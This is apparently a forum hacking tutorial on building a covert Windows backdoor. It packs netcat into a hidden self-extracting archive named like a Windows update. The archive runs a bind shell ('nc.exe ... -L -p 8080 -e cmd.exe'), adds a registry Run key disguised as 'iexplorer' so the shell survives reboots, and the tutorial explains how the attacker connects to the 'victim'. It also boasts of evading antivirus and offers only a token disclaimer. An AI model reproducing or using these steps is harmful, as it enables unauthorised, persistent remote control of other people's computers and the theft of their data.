Netcat Advanced: Backdoor Creation
Disclaimer: I am not responsible for how this information is used. I do not condone illegal activity. It is simple. If it isn't your pc don't mess with it. In this tutorial I will go into further detail on creating a
netcat backdoor. This backdoor is undetectable by most anti-vir[/u]us.[/u]
For this tutorial you will need:
- WinRar Archiver
-
Netcat (nc.exe from nc111nt.zip)
After WinRar is installed, right click on nc.exe. Scroll down and click on Add to archive…
Rename nc.rar to whatever you want (windowsupdate.rar, patch.rar, abstraktisabadass.rar, etc...)
Under Archiving options check the box create SFX archive you should see the archive name change from name.rar to name.exe.
Click on the tab Advanced and on the right side click on SFX options
Under Path to extract type
Code: - Quote :
- %homedrive%%homepath%\system32sys
Under
Run after extraction type
- Code:
-
nc.exe -vv -d -L -p 8080 -e cmd.exe
Under Run before extraction type
- Code:
-
%windir%\system32\cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\System32sys\nc.exe -vv -d -L -p 8080 -e cmd.exe" /f > nul
Click on the tab [b]Modes then check
Hide all and
Skip existing files (You may not have the option skip existing files depending on your version of WinRar. In this case don't worry about it. Your backdoor just won't be as cool as everyone elses.
)
Double check everything and click Ok, then click Ok again to create the backdoor. Your finished!
To connect to the victims computer Use nc <victims ip> <port> You should see the victims command prompt come up.
A SFX (SelF-eXtracting) archive is an archive merged with an executable module, which is used to extract files from the archive when executed. Thus, no external program is necessary to extract the contents of a SFX archive, it will execute itself. This backdoor sends nc.exe to the system32 folder. It then embeds itself into the registry. On startup it runs
netcat in listening mode. Once connected to, it will forward the victims command prompt. It is undetected by all anti-virus that I have tried.. I hope this tutorial was helpful.